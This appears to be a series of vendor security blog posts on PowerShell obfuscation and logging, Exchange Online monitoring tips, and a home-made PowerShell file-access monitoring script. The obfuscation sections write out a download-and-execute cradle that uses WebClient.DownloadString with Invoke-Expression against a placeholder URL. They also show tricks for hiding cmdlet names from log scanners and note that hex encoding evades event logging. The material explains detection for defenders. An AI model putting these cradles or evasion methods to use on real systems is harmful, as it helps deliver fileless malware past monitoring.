It’s a minor point, but it just means that the attackers would obfuscate the initial payload as well.

I was also mistaken in thinking that the obfuscations provided by Invoke-Obfuscation would not appear de-obfuscated in the log. For example, in the last post I tried one of the string obfuscations to produce this:

Essentially, it’s just a concatenation of separate strings that’s assembled together at run-time to form a cmdlet.

For this post, I sampled more of Invoke-Obfuscation’s scrambling options to see how the commandline appears in the Event log.

I tried its string re-order option (below), which takes advantage of some neat tricks in PowerShell.

Notice that first part, $env:comspec[4,15,25]? It takes the environment variable $env:comspec and pulls out the characters at positions 4, 15, and 25 to generate “IEX”, the PowerShell alias for Invoke-Expression. The -join operator takes the array and converts it to a string.

The next part of this PowerShell expression uses the format operator, f. If you’ve worked with sprintf-like commands as a programmer, you’ll immediately recognize these capabilities. However, with PowerShell, you can specify the element position in the parameter list that gets pulled in to create the resulting string. So {20}, {5}, {9}, {2} starts assembling yet another Invoke-Expression cmdlet.
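To see these two tricks in isolation, here’s a small, benign sketch; the Write-Host fragments stand in for whatever an attacker would actually reassemble.

```powershell
# Trick 1: pull characters 4, 15, and 25 out of $env:comspec
# (typically C:\WINDOWS\system32\cmd.exe) and join them to spell "iex".
-join $env:comspec[4,15,25]          # -> iex

# Trick 2: the format operator rebuilds a command from out-of-order string fragments.
$cmd = '{2}{0}{1}' -f 'rite-Host h', 'ello', 'W'   # -> Write-Host hello
& ([scriptblock]::Create($cmd))
```

Run either line in a console and you can see how a handful of indexes and format placeholders are enough to hide a keyword from a naive string match.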

Yes, this gets complicated very quickly!

I also let Invoke-Obfuscation select a la carte from its obfuscation menu, and it came up with the following mess:

After trying all these, I checked the Event Viewer to see that with the more powerful logging capabilities now enabled, Windows could see through the fog, and capture the underlying PowerShell:

Heavily obfuscated, but with PowerShell Module logging enabled the underlying cmdlets are available in the log.

Does this mean that PowerShell obfuscation always gets de-obfuscated in the Windows Event log, thereby allowing malware detectors to use traditional pattern matching?

The answer is no!

Invoke-Obfuscation also lets you encode PowerShell scripts into raw ASCII, Hex, and, yes, even Binary. And this encoding obfuscation seems to foil the event logging:

The underlying cmdlet represented by this Hex obfuscation was not detected.

Quantifying Confusion

It appears at this point the attackers have the advantage: a cloaking device that lets their scripts appear invisible to defenders or at least makes them very fuzzy.

The talk given at Black Hat that I referenced in the first post also introduced work done by Microsoft’s Lee Holmes – yeah, that guy —  along with Daniel Bohannon and other researchers in detecting obfuscated malware using probabilistic models and machine learning techniques.

If you’re interested you can look at the paper they presented at the conference. Holmes and his team borrowed techniques from natural language processing to analyze character frequency of obfuscated PowerShell scripts versus the benign varieties. There are differences!

Those dribbles below the main trend show that obfuscated PowerShell has a different character frequency than standard scripts.

In any case, Holmes and his group moved to a more complicated logistic regression model – basically classifying PowerShell code into either evil obfuscated or normal scripts. He then trained his logit by looking deep into PowerShell’s parsing of commands – gathering stats for levels of nesting, etc. – to come up with a respectable classifier with an accuracy of about 96%. Not by any means perfect, but a good start!

A Few More Thoughts

While I give a hat tip to Microsoft for improving their PowerShell logging game, there are still enough holes for attackers to get their scripts run without being detected. And this assumes that IT groups know to enable PowerShell Module logging in the first place!

The machine learning model suggests that it’s possible to  detect these stealthy scripts in the wild.

However, this means we’re back into the business of scanning for malware, and we know that this approach ultimately falls short. You can’t keep up with the attackers who are always changing and adjusting their code to fool the detectors.

Where is this leading? Of course, you turn on PowerShell logging as needed and try to keep your scanning software up to date, but in the end you need to have a solid secondary defense, one based on looking for post-exploitation activities involving file accesses of your sensitive data.

Catch what PowerShell log scanners miss! Request a demo today.

3 Tips to Monitor and Secure Exchange Online

Even if you don’t have your sights on the highest office in the country, keeping a tight leash on your emails is now more important than ever.

Email is commonly targeted by hackers as a method of entry into organizations. No matter if your email is hosted by a 3rd party or managed internally, it is imperative to monitor and secure those systems.

Microsoft Exchange Online – part of Microsoft’s Office 365 cloud offering – is just like Exchange on-prem, but you don’t have to deal with the servers. Microsoft provides some tools and reports to assist with securing and monitoring Exchange Online, like encryption and archiving, but it doesn’t cover all the things that keep you up at night, like:

  • What happens when a hacker gains access as an owner to an account?
  • What happens if a hacker elevates permissions and makes themselves owner of the CEO’s email?
  • What happens when hackers have access to make changes to the O365 environment? Will you even notice?

These questions are exactly what prompted us to develop our layered security approach – which Andy does a great job explaining the major principles of here. What happens when the bad people get in – and they have the ability to change and move around the system? At the end of the day, Exchange Online is another system that provides an attack vector for hackers.

Applying these same principles to Exchange Online, we can extrapolate the following to implement monitoring and security for your email in the cloud:

  1. Lock down access: Make sure only the correct people are owners of mailboxes, and limit the ability to make changes to permissions or O365 to a small group of administrators.
  2. Manage user access: Archive and delete inactive users immediately. Inactive users are an easy target for hackers, as they are usually able to use those accounts without being noticed (see the sketch after this list for one way to find them).
  3. Monitor behavior: Implement a User Behavior Analytics (UBA) system on top of your email monitoring. Being able to spot abnormal behavior early (e.g., an account being promoted to owner of the CEO’s email folder, or another account forwarding thousands of emails to the same address) is the key to stopping a hacker in hours or days instead of weeks or months.
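For points 1 and 2, a minimal sketch using the ExchangeOnlineManagement PowerShell module might look like this; the mailbox address and the 90-day cutoff are illustrative, not recommendations.

```powershell
# Assumes the module is installed: Install-Module ExchangeOnlineManagement
Import-Module ExchangeOnlineManagement
Connect-ExchangeOnline

# Mailboxes with no logon in the last 90 days are candidates for archiving or removal.
$cutoff = (Get-Date).AddDays(-90)
Get-Mailbox -ResultSize Unlimited |
    Get-MailboxStatistics |
    Where-Object { $_.LastLogonTime -lt $cutoff } |
    Select-Object DisplayName, LastLogonTime

# Review non-default full-access grants on a sensitive (hypothetical) mailbox.
Get-MailboxPermission -Identity 'ceo@contoso.com' |
    Where-Object { $_.IsInherited -eq $false -and $_.User -notlike 'NT AUTHORITY\SELF' } |
    Select-Object User, AccessRights
```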

Wondering if there’s a good solution to help monitor your Exchange Online? Well, we’ve got you covered there too.

PowerShell Obfuscation: Stealth Through Confusion, Part I

This article is part of the series "PowerShell Obfuscation". Check out the rest:

To get into the spirit of this post, you should probably skim through the first few slides of this presentation by Daniel Bohannon and Lee Holmes, given at Black Hat 2017. Who would have thunk that making PowerShell commands look unreadable would require a triple-digit slide deck?

We know PowerShell is the go-to tool for post-exploitation, allowing attackers to live off the land and prosper. Check out our pen testing Active Directory series for more proof.

However, IT security is, in theory, monitoring user activities at, say, the Security Operations Center, or SOC, so it should be easy to spot when a “non-normal” command is being executed.

In fact, we know that one tipoff of a PowerShell attack is when a user creates a WebClient object, calls its DownloadString method, and then executes the string contained in the remote web page. Something like the following:
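The original screenshot isn’t reproduced here, but a generic cradle of this type looks roughly like the sketch below; the URL is a placeholder, and in a lab the remote “payload” would be something harmless.

```powershell
# Illustrative download cradle: fetch a remote script as a string and execute it in memory.
$wc = New-Object System.Net.WebClient
Invoke-Expression $wc.DownloadString('http://example.com/payload.ps1')   # placeholder URL
```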

Why would an ordinary user or even for that matter an admin do this?

While this “clear text” is easy to detect by looking at the right logs in Windows and scanning for the appropriate keywords, the obfuscated version is anything but. At the end of this post, we’ll show how this basic “launch cradle” used by hackers can be made to look like a complete, undecipherable word jumble.

PowerShell Logging    

Before we take our initial dive into obfuscation, let’s explore how events actually get logged by Windows, specifically for PowerShell. Once you see the logs, you’ll get a greater appreciation of what hackers are trying to hide.

To their credit, Microsoft has realized the threat possibilities in PowerShell and started improving command logging in Windows 7. You see these improvements in PowerShell versions 4 and 5.

In my own AWS environment, the Windows Server 2012 I used came equipped with version 4. It seems to have most of the advanced logging capabilities — though 5 has the latest and greatest.

From what I was able to grok reading Bohannon’s great presentation and a few other Microsoft sources, you need to enable event 4688 (process creation) and then turn on auditing of the PowerShell command line. You can read more about it in this Microsoft document.
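Here’s a minimal sketch of those two switches set locally on a test box; centrally, they would come from Group Policy.

```powershell
# Enable auditing of process creation (event 4688)...
auditpol /set /subcategory:"Process Creation" /success:enable

# ...and include the full command line in those 4688 events.
$auditKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit'
if (-not (Test-Path $auditKey)) { New-Item -Path $auditKey -Force | Out-Null }
Set-ItemProperty -Path $auditKey -Name 'ProcessCreationIncludeCmdLine_Enabled' -Value 1
```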

And then for even more voluminous logging, you can set policies in the GPO console to enable, for example, full transcription logging of PowerShell sessions (below).

More PowerShell logging features in the Administrative Templates under Computer Configuration.

No, I didn’t do that for my own testing! I discovered (as many other security pros have) that when using the Windows Event Viewer  things get confusing very quickly. I don’t need the full power of transcription logging.

For kicks I ran a simple pipeline — Get-Process | %{Write-Host $_.Handles} — to print out process handles, and generated … an astonishing 114 events in the PowerShell log. Ofer, by the way, has a good post explaining the larger problem of correlating separate events to understand the full picture.

Got it! The original pipeline that spewed off lots of related events.

The good news is that from the Event Viewer,  I was able to see the base command line that triggered the event cascade (above).

Release the Confusion

The goal of the attacker is to make it very difficult or impossible for security staff viewing the log to detect obvious hacking activity or, more likely, fool analytics software to not trigger when malware is loaded.

In the aforementioned presentation, there’s a long, involved example, showing how to obfuscate malware by exploiting PowerShell’s ability to execute commands embedded in a string.

Did you know this was possible?

Or, at a more evil level, this:

Or take a look at this, which I cooked up based on my own recipe:

Yeah, PowerShell is incredibly flexible and the hackers are good at taking advantage of its features to create confusion.

You can also ponder this one, which uses environment variables in an old-fashioned Windows shell to hide the evil code and then pipe it into PowerShell:

You should keep in mind that in a PowerShell pipeline, each pipe segment runs as a separate process, which spews its own events for maximum log confusion. The goal in the above example is to use the %cmd% variable to hide the evil code.
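The screenshot isn’t shown here, but a rough sketch of the kind of cradle being described, with a harmless stand-in payload, might look like this from an old-fashioned command prompt:

```
rem Stash the (here harmless) PowerShell payload in an environment variable,
rem then echo it and pipe it into powershell.exe, which reads the command from stdin.
set cmd=Write-Host evil malware
cmd /c "echo %cmd% | powershell -NoProfile -Command -"
```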

However, from my Windows Event Viewer,  I was able to spot the full original command line — though it took some digging.

In theory, you could look for the actual malware signature, which in my example is  represented by “write-host evil malware”, within the Windows logs by scanning the command lines.

But hackers have become very clever at making the malware signature itself invisible. That’s really the example I started with.

The idea is to use the WebClient .Net object to read the malware that’s contained on a remote site and then execute it with PowerShell’s Invoke-Expression. In the Event Viewer, you can’t see the actual code!

This is known as fileless malware and has become a very popular technique among the hackeratti. As I mentioned in the beginning, security pros can counteract this by looking instead for WebClient and DownloadString in the command line. It’s just not a normal user command, at least in my book.
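As a rough sketch, that keyword hunt through the PowerShell Operational log (assuming the logging discussed above is turned on) could look something like this:

```powershell
# Scan the PowerShell Operational log for download-cradle keywords.
Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' |
    Where-Object { $_.Message -match 'WebClient|DownloadString|Invoke-Expression|IEX' } |
    Select-Object TimeCreated, Id,
        @{ n = 'Snippet'; e = { $_.Message.Substring(0, [Math]::Min(120, $_.Message.Length)) } } |
    Format-Table -Wrap
```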

A Quick Peek at Invoke-Obfuscation

This is where Bohannon’s Invoke-Obfuscation tool comes into play. He spent a year exploring all kinds of PowerShell command line obfuscation techniques (and he’s got the beard to prove it!) to make it almost impossible to scan for obvious keywords.

His obfuscations are based on escape sequences and clever PowerShell programming to manipulate commands.
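To give you a feel for it, here are a few hand-rolled approximations of the kinds of manipulations his tool automates (these are mine, not actual Invoke-Obfuscation output):

# Concatenate the command name and invoke it via the call operator
& ('Write-' + 'Host') 'evil malware'

# Reorder string fragments with the format operator, then execute the result
IEX ("{1}{0}" -f "Host 'evil malware'", 'Write-')

# Randomize case -- PowerShell doesn't care
iNvOkE-eXpReSsIoN "wRiTe-hOsT 'evil malware'"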

I loaded his Invoke-Obfuscation app onto my AWS server and tried it out for myself. We’ll explore more of this tool next time, but here’s what happened when I gave it the above WebClient DownloadString fileless command string:

Invoke-Obfuscation’s string obfuscation. Hard to search for malware signatures within this jumble.

Very confusing! And I was able to test the obfuscated PowerShell within his app.

Next time we’ll look at more of Invoke-Obfuscation’s powers and touch on new ways to spot these confusing, but highly dangerous, PowerShell scripts.



[Podcast] Varonis Director of Cyber Security Ofer Shezaf, Part I




A self-described all-around security guy, Ofer Shezaf is in charge of security standards for Varonis products. He has had a long career that includes most recently a stint at Hewlett-Packard, where he was a product manager for their SIEM software, known as ArcSight. Ofer is a graduate of Israel’s Technion University.

It’s always great to talk to Ofer about data security since his perspective is shaped by a 20-year career. He’s seen it all! In the first part of our interview, we learn how hackers have taken long-standing techniques such as SQL injection and built successful business models around their malware.

Can they be stopped? Ofer thinks we’ll first need to have new metrics and measurements describing the security of developed software. Click on the interview above to hear more about what he has to say.



Practical PowerShell for IT Security, Part V: Security Scripting Platform Gets a Makeover

A few months ago, I began a mission to prove that PowerShell can be used as a security monitoring tool. I left off with this post, which had PowerShell code to collect file system events, perform some basic analysis, and then present the results in graphical format. My Security Scripting Platform (SSP) may not be a minimum viable product, but it was, I think, useful as a simple monitoring tool for a single file directory.

After finishing the project, I knew there were areas for improvement. The event handling was clunky, the passing of information between the various parts of the SSP platform was anything but straightforward, and the information displayed by the very primitive Out-GridView was really just a glorified table.

New and Improved

I took up the challenge of making SSP a bit more viable. My first task was to streamline event handling. I had initially worked it out so that file event messages were picked up by a handler in my Register-EngineEvent scriptblock, sent to an internal queue, and then finally forwarded to the main piece of code, the classification software.

I regained my sanity and realized I could just forward the messages directly with Register-EngineEvent -Forward from within the event handling scriptblock, removing an unnecessary layer of queuing craziness.

You can see the meaner, leaner version below.

#Count events, detect bursts, forward to main interface

$cur = Get-Date
$Global:Count=0
$Global:baseline = @{"Monday" = @(1,1,1); "Tuesday" = @(1,.5,1);"Wednesday" = @(4,4,4);"Thursday" = @(7,12,4); "Friday" = @(5,4,6); "Saturday"=@(2,1,1); "Sunday"= @(2,4,2)}
$Global:cnts =     @(0,0,0)
$Global:burst =    $false
$Global:evarray =  New-Object System.Collections.ArrayList

$action = { 
    $Global:Count++  
    $d=(Get-Date).DayofWeek
    $i= [math]::floor((Get-Date).Hour/8) 

   $Global:cnts[$i]++ 
   

   #event auditing!
    
   $rawtime =  $EventArgs.NewEvent.TargetInstance.LastAccessed.Substring(8,6)
   $filename = $EventArgs.NewEvent.TargetInstance.Name
   $etime= [datetime]::ParseExact($rawtime,"HHmmss",$null)
  

   $msg="$($etime): Access of file $($filename)"
   $msg|Out-File C:\Users\Administrator\Documents\events.log -Append
  
   New-Event -SourceIdentifier Delta -MessageData "Access" -EventArguments $filename  #notify 
   
   $Global:evarray.Add(@($filename,$etime))
   if(!$Global:burst) {
      $Global:start=$etime
      $Global:burst=$true            
   }
   else { 
     if($Global:start.AddMinutes(15) -gt $etime ) { 
        $Global:Count++
        #File behavior analytics
        $sfactor=2*[math]::sqrt( $Global:baseline["$($d)"][$i])
       
        if ($Global:Count -gt $Global:baseline["$($d)"][$i] + 2*$sfactor) {  #at 95% level of poisson
         
         
          "$($etime): Burst of $($Global:Count) accesses"| Out-File C:\Users\Administrator\Documents\events.log -Append 
          $Global:Count=0
          $Global:burst =$false
          New-Event -SourceIdentifier Delta -MessageData "Burst" -EventArguments $Global:evarray #notify on burst
          
          $Global:evarray= [System.Collections.ArrayList] @()
        }
     }
     else { $Global:burst =$false; $Global:Count=0; $Global:evarray= [System.Collections.ArrayList]  @()}
   }     
} 

Register-EngineEvent -SourceIdentifier Delta -Forward 
Register-WmiEvent -Query "SELECT * FROM __InstanceModificationEvent WITHIN 5 WHERE TargetInstance ISA 'CIM_DataFile' and TargetInstance.Path = '\\Users\\Administrator\\' and targetInstance.Drive = 'C:' and (targetInstance.Extension = 'txt' or targetInstance.Extension = 'doc' or targetInstance.Extension = 'rtf') and targetInstance.LastAccessed > '$($cur)' " -sourceIdentifier "Accessor" -Action $action   
Write-Host "starting engine ..."

while ($true) {

   Wait-Event -SourceIdentifier Access # just hang on this so I don't exit    
  
}

 

Then I took on the main piece of code, where I classify files based on whether they have social security numbers and other sensitive keywords. As events come in from the handler, the file reclassification is triggered. This code then periodically displays some of the results of the classification.

In this latest version, I removed the “real-time” classification and focused on cleaning up the PowerShell code and improving the graphics — more on that below.

I took a wrong turn in the original version by relying on a PowerShell data-locking module to synchronize data access from the concurrent tasks I used for some of the grunt work. On further testing, the freebie module that implements the Lock-Object cmdlet didn’t seem to work.

As every junior system programmer knows, it’s easier to synchronize with messages than with low-level locks. I reworked the code to take the messages from the event handler above, and send them directly to a main message processing loop. In short: I was able to deal with asynchronous events in a synchronous manner.

.Net Framework Charts and PowerShell

My great discovery in the last month was that I could embed Microsoft-style charts inside PowerShell. In other words, the bar, line, scatter and other charts that are available in Excel and Word can be controlled programmatically in PowerShell. As a newbie PowerShell programmer, I found this exciting. You can read more about .Net Framework Controls in this post.
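To make that concrete, here’s a minimal sketch of driving a .Net chart control directly from PowerShell. This is my own module-free example; the freebie wrapper module mentioned below hides most of this plumbing.

# Build and display a simple pie chart with the .Net charting controls
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Windows.Forms.DataVisualization

$chart = New-Object System.Windows.Forms.DataVisualization.Charting.Chart
$chart.Width = 500; $chart.Height = 400
$area = New-Object System.Windows.Forms.DataVisualization.Charting.ChartArea
$chart.ChartAreas.Add($area)

$series = $chart.Series.Add('Files')
$series.ChartType = [System.Windows.Forms.DataVisualization.Charting.SeriesChartType]::Pie
[void]$series.Points.AddXY('Top Secret', 3)
[void]$series.Points.AddXY('Sensitive', 7)

$form = New-Object System.Windows.Forms.Form
$chart.Dock = 'Fill'
$form.Controls.Add($chart)
[void]$form.ShowDialog()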

It’s a great idea, and it meant I could also replace the messy Out-GridView code.

But the problem, I quickly learned, is that you also have to deal with some of the interactive programming involved with Microsoft forms. I just wanted to display my .Net charts while not having to code the low-level details. Is there a lazy way out?

After much struggle, I came to see that the easiest way to do this is to launch each chart in its own runspace as a separate task. (Nerd Note: this is how I avoided coding message handling for all the charts, since each one runs separately as a modal dialog.)

I also benefited from this freebie PowerShell module that wraps the messy .Net chart controls. Thanks Marius!

I already had set up a tasking system earlier to scan and classify each file in the directory I was monitoring, so it was just a matter of reusing this tasking code to launch graphs.

I created a pie chart showing the relative concentration of sensitive data, a bar chart breaking down files by sensitive data type, and, the one I’m most proud of, a classic event stair-step chart of file access burst conditions, a possible sign of an attack.

My amazing dashboard. Not bad for PowerShell with .Net charts.

For those who are curious about the main chunk of code doing all the work of my SSP, here it is for your entertainment:

 
$scan = {  #file content scanner
$name=$args[0]
function scan {
   Param (
      [parameter(position=1)]
      [string] $Name
   )
      $classify =@{"Top Secret"=[regex]'[tT]op [sS]ecret'; "Sensitive"=[regex]'([Cc]onfidential)|([sS]nowflake)'; "Numbers"=[regex]'[0-9]{3}-[0-9]{2}-[0-9]{4}' }  #SSNs are 3-2-4 digits
     
      $data = Get-Content $Name
      
      $cnts= @()
      
      if($data.Length -eq 0) { return $cnts} 
      
      foreach ($key in $classify.Keys) {
       
        $m=$classify[$key].matches($data)           
           
        if($m.Count -gt 0) {
           $cnts+= @($key,$m.Count)  
        }
      }   
 $cnts   
}
scan $name
}




#launch a .net chart 
function nchart ($r, $d, $t,$g,$a) {

$task= {
Param($d,$t,$g,$a)

Import-Module C:\Users\Administrator\Documents\charts.psm1
$chart = New-Chart -Dataset $d -Title $t -Type $g -Axis $a
Show-Chart $chart

}
$Task = [powershell]::Create().AddScript($task).AddArgument($d).AddArgument($t).AddArgument($g).AddArgument($a)
$Task.RunspacePool = $r
$Task.BeginInvoke()

}

Register-EngineEvent -SourceIdentifier Delta -Action {
      
      if($event.MessageData -eq "Burst") { #just look at bursts
        New-Event -SourceIdentifier File -MessageData $event.MessageData -EventArguments $event.SourceArgs 
      }
      
      
      Remove-Event -SourceIdentifier Delta
}




$list=Get-WmiObject -Query "SELECT * From CIM_DataFile where Path = '\\Users\\Administrator\\' and Drive = 'C:' and (Extension = 'txt' or Extension = 'doc' or Extension = 'rtf')"  


#long list --let's multithread

#runspace
$RunspacePool = [RunspaceFactory]::CreateRunspacePool(1,5)
$RunspacePool.Open()
$Tasks = @()




foreach ($item in $list) {
  
  $Task = [powershell]::Create().AddScript($scan).AddArgument($item.Name)
  $Task.RunspacePool = $RunspacePool
  
  $status= $Task.BeginInvoke()
  $Tasks += @($status,$Task,$item.Name)
}




#wait
while ($Tasks.isCompleted -contains $false){
   Start-Sleep -Milliseconds 200   #poll politely instead of pegging a core
}


#Analytics, count number of sensitive content for each file
$obj = @{}
$tdcnt=0
$sfcnt=0
$nfcnt=0


for ($i=0; $i -lt $Tasks.Count; $i=$i+3) {
   $match=$Tasks[$i+1].EndInvoke($Tasks[$i]) 
  
   if ($match.Count -gt 0) {   
      $s = ([string]$Tasks[$i+2]).LastIndexOf("\")+1
      
      $obj.Add($Tasks[$i+2].Substring($s),$match)
       for( $j=0; $j -lt $match.Count; $j=$j+2) {      
         switch -wildcard ($match[$j]) {
             'Top*'  { $tdcnt+= 1 }
                      
             'Sens*' { $sfcnt+= 1}                      
                      
             'Numb*' { $nfcnt+=1} 
                                              
      }         
            
       }
   }    
   $Tasks[$i+1].Dispose()
   
}


#Display Initial Dashboard
#Pie chart of sensitive files based on total counts of sensitive data
$piedata= @{}
foreach ( $key in $obj.Keys) {
   $senscnt =0
   for($k=1; $k -lt $obj[$key].Count;$k=$k+2) {
     $senscnt+= $obj[$key][$k]

   }
   $piedata.Add($key, $senscnt) 

}


nchart $RunspacePool $piedata "Files with Sensitive Content" "Pie" $false

#Bar Chart of Total Files, Sensitive  vs Total
$bardata = @{"Total Files" = [int]($Tasks.Count/3)}  #$Tasks holds 3 entries (status, task, name) per file
$bardata.Add("Files w. Top Secret",$tdcnt)
$bardata.Add("Files w. Sensitive", $sfcnt)
$bardata.Add("Files w. SS Numbers",$nfcnt)


nchart $RunspacePool $bardata "Sensitive Files" "Bar" $false


#run event handler as a separate job
Start-Job -Name EventHandler -ScriptBlock({C:\Users\Administrator\Documents\evhandler.ps1})


while ($true) { #main message handling loop
   
       [System.Management.Automation.PSEventArgs] $args = Wait-Event -SourceIdentifier File  # wait on event
        Remove-Event -SourceIdentifier File
        #Write-Host $args.SourceArgs      
        if ($args.MessageData -eq "Burst") {
        #Display Bursty event
         $dt=$args.SourceArgs
         #time in seconds
         [datetime]$sevent =$dt[0][1]
         
         $xyarray = [ordered]@{}
         $xyarray.Add(0,1)
         for($j=1;$j -lt $dt.Count;$j=$j+1) {
               [timespan]$diff = $dt[$j][1] - $sevent
               $xyarray.Add($diff.Seconds,$j+1) 
          }
          nchart $RunspacePool $xyarray "Burst Event" "StepLine" $true 
        }        
        
   
}#while

Write-Host "Done!"

 

Lessons Learned

Of course, with any mission the point is the journey, not the actual goal, right? The key thing I learned is that you can use PowerShell to do security monitoring. For a single directory, on a small system. And only using it sparingly.

While I plan on improving what I just presented by adding real-time graphics, I’m under no illusion that my final software would be anything more than a toy project.

File event monitoring, analysis, and graphical display of information for an entire system is very, very hard to do on your own. You can, perhaps, recode my solution using C++, but you’ll still have to deal with the lags and hiccups of processing low-level events in the application space. To do this right, you need to have hooks deep in the OS — for starters — and then do far more serious analysis of file events than is performed in my primitive analytics code. That ain’t easy!

I usually end these DIY posts by saying “you know where this is going.” I won’t disappoint you.

You know where this is going. Our own enterprise-class solution is a true data security platform or DSP – it handles classification, analytics, threat detection, and more for entire IT systems.

By all means, try to roll your own, perhaps based on this project, to learn the difficulties and appreciate what a DSP is actually doing.

Have questions? Feel free to contact us!

Next Steps

If you’re interested in learning more practical, security-focused PowerShell, you can unlock the full 3-hour video course on PowerShell and Active Directory Essentials with the code cmdlet.